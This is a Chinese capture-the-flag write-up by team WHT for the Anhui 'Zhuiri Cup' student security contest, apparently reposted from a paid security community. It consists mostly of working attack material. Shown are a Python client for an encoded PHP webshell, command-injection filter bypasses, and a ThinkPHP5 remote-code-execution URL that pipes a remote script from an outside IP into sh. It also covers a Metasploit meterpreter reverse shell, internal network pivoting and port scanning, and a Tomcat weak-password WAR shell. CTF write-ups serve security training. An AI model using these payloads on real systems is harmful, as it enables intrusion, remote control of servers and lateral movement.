首届安徽"追日杯"大学生网络安全挑战赛WRITEUP-技术圈

首届安徽"追日杯"大学生网络安全挑战赛 WRITEUP

本文来自“白帽子社区知识星球”

作者：WHT战队

白帽子社区知识星球

加入星球，共同进步

checkin

一打开题目复制答案，提交即可。

flag值：flag{welcome_to_zrb@2021}

伊泽瑞尔的php

Exp：

```python#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time    : 2021/12/5 10:59# @Author  : upload# @File    : ada.py# @Software: PyCharmimport requestsimport zlibimport reimport base64
def x(t,k):  return ''.join([chr(ord(x)^ord(y)) for x,y in zip(t,k*(len(t)/len(k)+1))])
session = requests.Session()# @eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));cmd = 'system("cat /flag");'cmd = zlib.compress(cmd)cmd = x(cmd,"25ed1bcb")cmd = base64.b64encode(cmd)
rawBody = "423b0b7200f4{cmd}85fc5ff71c8e".format(cmd=cmd)print(rawBody)response = session.post("http://ctf.zrb.edisec.net:19859//index.php", data=rawBody)
print("Response body: %s" % response.content)res = re.findall(r'niGqOXD4rBhBWZ7t423b0b7200f4(.+)85fc5ff71c8e',response.content)[0]
# $r=@base64_encode(@x(@gzcompress($o),$k));res = base64.b64decode(res)res = x(res,"25ed1bcb")res = zlib.decompress(res)print(res)```

gotofly

```python#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time    : 2021/12/5 9:56# @Author  : upload# @File    : exp.py# @Software: PyCharm

import requestssession = requests.session()import requests
burp0_url = "http://ctf.zrb.edisec.net:30989/flag"burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://ctf.zrb.edisec.net:34231/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
ip =  "http://ctf.zrb.edisec.net:34231"r1 = session.get(url=burp0_url,allow_redirects=False)print(r1.headers.get('Location'))r2 = session.get(r1.headers.get('Location'),allow_redirects=False)print(r2.headers.get('Location'))url = ip + r2.headers.get('Location')for i in range(0,1000):    r3 = session.get(url,allow_redirects=False)    print(r3.text)    url = ip + r3.headers.get('Location')    print(url)

# while True:#     if r1.status_code==301 or r1.status_code == 302:#         r1 = result.get(burp0_url,burp0_headers)

2_let_me_rce

经测试：

①绕过空格 %09

②列目录命令 du -a . 或chgrp -v -R

③ 查看文件 sed p

查看文件：

?cmd=sed%09p%09f1ag_1s_here%09```
```http://ctf.zrb.edisec.net:57807/?cmd='.`sed%09p%09/cccccreal_flag_here_ccccfffffffllllllllaggggg%09`.'```

综合渗透-FLAG1

thinkphp5 rce反弹shell

http://82.156.76.152:8077/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20116.62.104.172|sh

上线msf

```use exploit/multi/script/web_deliveryshow targetsset target 6set payload linux/x64/meterpreter/reverse_tcpset lhost 10.18.228.36run```

查看网段

添加路由

```run autoroute -s 10.134.110.0/24```

扫描存活主机

```msf6 auxiliary(scanner/portscan/tcp) > run[*] 1.14.65.168 - Meterpreter session 6 closed.  Reason: Died
[*] Sending stage (3008420 bytes) to 1.14.65.168[+] 10.134.110.26:        - 10.134.110.26:8080 - TCP OPEN[*] 10.134.110.0/24:      - Scanned  26 of 256 hosts (10% complete)[+] 10.134.110.34:        - 10.134.110.34:3306 - TCP OPEN[+] 10.134.110.52:        - 10.134.110.52:80 - TCP OPEN[+] 10.134.110.52:        - 10.134.110.52:6379 - TCP OPEN[*] 10.134.110.0/24:      - Scanned  52 of 256 hosts (20% complete)[*] 10.134.110.0/24:      - Scanned  78 of 256 hosts (30% complete)[*] 10.134.110.0/24:      - Scanned 103 of 256 hosts (40% complete)[*] Meterpreter session 8 opened (172.16.174.127:4444 -> 1.14.65.168:41826) at 2021-12-05 14:06:12 +0800[*] 10.134.110.0/24:      - Scanned 128 of 256 hosts (50% complete)[*] 10.134.110.0/24:      - Scanned 155 of 256 hosts (60% complete)[*] 10.134.110.0/24:      - Scanned 180 of 256 hosts (70% complete)[*] 10.134.110.0/24:      - Scanned 205 of 256 hosts (80% complete)[*] 10.134.110.0/24:      - Scanned 231 of 256 hosts (90% complete)[*] 10.134.110.0/24:      - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed
```

综合渗透-FLAG3

发现存活主机10.134.110.26开放了8080端口

10.134.110.26:8080

使用msf将8080转发到8082端口

```portfwd add -l 8082 -p 8080 -r 10.134.110.26```

为一个tomcat服务

```/manager/html```

弱口令tomcat/tomcat，部署war包，拿到flag3

116.62.104.172:8082/cmd/cmd.jsp?cmd=cat+%2Fflag3

问卷

如果觉得本文不错的话，欢迎加入知识星球，星球内部设立了多个技术版块，目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类，还可以与嘉宾大佬们接触，在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼